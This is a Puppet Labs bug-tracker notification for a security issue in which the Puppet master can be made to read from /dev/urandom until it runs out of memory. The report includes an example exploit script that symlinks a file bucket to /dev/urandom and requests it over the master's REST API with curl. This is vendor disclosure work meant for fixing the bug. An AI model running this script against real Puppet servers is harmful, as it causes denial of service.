Issue #13553 has been updated by Andrew Parker. Status changed from Unreviewed to Accepted Assignee set to Andrew Parker
---------------------------------------- Bug #13553: Puppet master can be cause to read data until it is out of memory https://projects.puppetlabs.com/issues/13553#change-59027 Author: Andrew Parker Status: Accepted Priority: High Assignee: Andrew Parker Category: security Target version: Affected Puppet version: Keywords: Branch: Using the symlink attack described in Bug #13511 the puppet master can be caused to read from a stream (e.g. /dev/random) when either trying to save a file or read a file. Because of the way in which the puppet master deals with sending files on the filesystem to a remote system via a REST request the thread handling the request will block forever reading from that stream and continually consuming more memory. This can lead to the puppet master system running out of memory and cause a denial of service. Example exploit: <pre> #!/usr/bin/env sh MD5_TO_REQUEST='d41d8cd98f00b204e9800998ecf8427e' FILE_BUCKET_DIR="/tmp/buckets" EXPLOIT_BUCKET="$FILE_BUCKET_DIR/d/4/1/d/8/c/d/9/$MD5_TO_REQUEST" # Setup needed on the puppet master mkdir -p $EXPLOIT_BUCKET ln -sf /dev/urandom $EXPLOIT_BUCKET/contents # performaned from anywhere that has access to the keys curl --cert ~/work/test/conf/client/ssl/certs/systems-macbook-pro.local.pem\ --key ~/work/test/conf/client/ssl/private_keys/systems-macbook-pro.local.pem\ --cacert ~/work/test/conf/master/ssl/ca/ca_crt.pem\ -H 'Accept: yaml'\ https://localhost:8140/production/file_bucket_file/md5/$MD5_TO_REQUEST?bucket_path=$FILE_BUCKET_DIR </pre> Note: this can also be done using the 'text/marshal' exploit of putting files described in Bug #13552 -- You have received this notification because you have either subscribed to it, or are involved in it. To change your notification preferences, please click here: http://projects.puppetlabs.com/my/account -- You received this message because you are subscribed to the Google Groups "Puppet Bugs" group. To post to this group, send email to [email protected]. To unsubscribe from this group, send email to [email protected]. For more options, visit this group at http://groups.google.com/group/puppet-bugs?hl=en.
